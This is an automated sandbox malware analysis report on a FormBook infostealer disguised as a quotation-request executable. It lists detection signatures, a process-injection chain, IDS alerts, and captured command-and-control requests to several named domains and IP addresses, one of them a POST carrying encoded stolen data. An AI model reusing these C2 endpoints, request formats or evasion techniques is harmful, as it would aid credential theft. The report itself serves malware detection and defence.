Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation Request-349849.exe

Overview

General Information

Sample name:Quotation Request-349849.exe
Analysis ID:1574656
MD5:060d1fa22ca3227bef173104f09a853c
SHA1:d0f22b602ce5640f9594a45008751f027523e1f9
SHA256:89d993d7acbce99b1378c80d9e0ee143141eb06dd1bd926dd23f941f0ca704ad
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Quotation Request-349849.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\Quotation Request-349849.exe" MD5: 060D1FA22CA3227BEF173104F09A853C)
    • svchost.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\Quotation Request-349849.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • LcmEonpIrfS.exe (PID: 1104 cmdline: "C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • comp.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)
          • LcmEonpIrfS.exe (PID: 6896 cmdline: "C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6768 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ParentImage: C:\Users\user\Desktop\Quotation Request-349849.exe, ParentProcessId: 7688, ParentProcessName: Quotation Request-349849.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ProcessId: 7820, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ParentImage: C:\Users\user\Desktop\Quotation Request-349849.exe, ParentProcessId: 7688, ParentProcessName: Quotation Request-349849.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation Request-349849.exe", ProcessId: 7820, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-13T13:07:23.267453+010020507451Malware Command and Control Activity Detected192.168.2.74982238.47.233.2180TCP
                2024-12-13T13:07:48.401968+010020507451Malware Command and Control Activity Detected192.168.2.749880172.67.137.4780TCP
                2024-12-13T13:08:05.631634+010020507451Malware Command and Control Activity Detected192.168.2.749924206.238.89.11980TCP
                2024-12-13T13:08:20.715432+010020507451Malware Command and Control Activity Detected192.168.2.74996166.29.149.4680TCP
                2024-12-13T13:08:36.422986+010020507451Malware Command and Control Activity Detected192.168.2.749990217.70.184.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-13T13:07:23.267453+010028554651A Network Trojan was detected192.168.2.74982238.47.233.2180TCP
                2024-12-13T13:07:48.401968+010028554651A Network Trojan was detected192.168.2.749880172.67.137.4780TCP
                2024-12-13T13:08:05.631634+010028554651A Network Trojan was detected192.168.2.749924206.238.89.11980TCP
                2024-12-13T13:08:20.715432+010028554651A Network Trojan was detected192.168.2.74996166.29.149.4680TCP
                2024-12-13T13:08:36.422986+010028554651A Network Trojan was detected192.168.2.749990217.70.184.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-13T13:07:40.295192+010028554641A Network Trojan was detected192.168.2.749858172.67.137.4780TCP
                2024-12-13T13:07:42.951429+010028554641A Network Trojan was detected192.168.2.749868172.67.137.4780TCP
                2024-12-13T13:07:45.607692+010028554641A Network Trojan was detected192.168.2.749874172.67.137.4780TCP
                2024-12-13T13:07:57.623567+010028554641A Network Trojan was detected192.168.2.749902206.238.89.11980TCP
                2024-12-13T13:08:00.279671+010028554641A Network Trojan was detected192.168.2.749911206.238.89.11980TCP
                2024-12-13T13:08:02.936016+010028554641A Network Trojan was detected192.168.2.749918206.238.89.11980TCP
                2024-12-13T13:08:12.721564+010028554641A Network Trojan was detected192.168.2.74994166.29.149.4680TCP
                2024-12-13T13:08:15.375502+010028554641A Network Trojan was detected192.168.2.74994866.29.149.4680TCP
                2024-12-13T13:08:18.034708+010028554641A Network Trojan was detected192.168.2.74995566.29.149.4680TCP
                2024-12-13T13:08:27.793769+010028554641A Network Trojan was detected192.168.2.749978217.70.184.5080TCP
                2024-12-13T13:08:30.458875+010028554641A Network Trojan was detected192.168.2.749985217.70.184.5080TCP
                2024-12-13T13:08:33.827966+010028554641A Network Trojan was detected192.168.2.749989217.70.184.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Quotation Request-349849.exeReversingLabs: Detection: 47%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Quotation Request-349849.exeJoe Sandbox ML: detected
                Source: Quotation Request-349849.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: comp.pdb source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LcmEonpIrfS.exe, 00000005.00000002.2557763913.00000000000AE000.00000002.00000001.01000000.00000005.sdmp, LcmEonpIrfS.exe, 00000007.00000000.1802114008.00000000000AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000003.00000002.1736652704.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1700765800.000000000341A000.00000004.00000020.00020000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2558594829.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Quotation Request-349849.exe, 00000000.00000003.1329291925.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Quotation Request-349849.exe, 00000000.00000003.1329853611.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1631379626.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1633192176.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1736871336.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 00000006.00000003.1737169537.0000000000934000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000003.1738926015.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000ACE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2560633514.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000006.00000002.2561548663.000000000311C000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2033303395.00000000062BC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0083445A
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083C6D1 FindFirstFileW,FindClose,0_2_0083C6D1
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0083C75C
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0083EF95
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0083F0F2
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0083F3F3
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008337EF
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00833B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00833B12
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0083BCBC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_0041C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0041C420
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then xor eax, eax6_2_00409F20
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then pop edi6_2_0040E0FB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then mov ebx, 00000004h6_2_02D90528

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49902 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49858 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49880 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49880 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49918 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49911 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49941 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49874 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49822 -> 38.47.233.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49822 -> 38.47.233.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49948 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49955 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49990 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49990 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49924 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49924 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49961 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49961 -> 66.29.149.46:80
                Source: Joe Sandbox ViewIP Address: 217.70.184.50 217.70.184.50
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008422EE
                Source: global trafficHTTP traffic detected: GET /t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5V HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.qqa79.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5V HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.127358.winConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5V HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.infohive.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5V HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sunnyz.storeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficDNS traffic detected: DNS query: www.qqa79.top
                Source: global trafficDNS traffic detected: DNS query: www.gk88top.top
                Source: global trafficDNS traffic detected: DNS query: www.127358.win
                Source: global trafficDNS traffic detected: DNS query: www.infohive.website
                Source: global trafficDNS traffic detected: DNS query: www.sunnyz.store
                Source: unknownHTTP traffic detected: POST /vjnn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.gk88top.topContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 219Cache-Control: no-cacheOrigin: http://www.gk88top.topReferer: http://www.gk88top.top/vjnn/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)Data Raw: 55 5a 6b 74 5f 70 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 72 5a 38 42 43 56 53 55 75 6a 67 36 65 6c 6e 43 69 71 55 6f 45 33 77 2f 4b 2f 56 31 77 73 54 4c 6f 6c 74 77 56 45 78 48 72 4d 51 47 50 54 70 4e 51 3d 3d Data Ascii: UZkt_p=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeurZ8BCVSUujg6elnCiqUoE3w/K/V1wsTLoltwVExHrMQGPTpNQ==
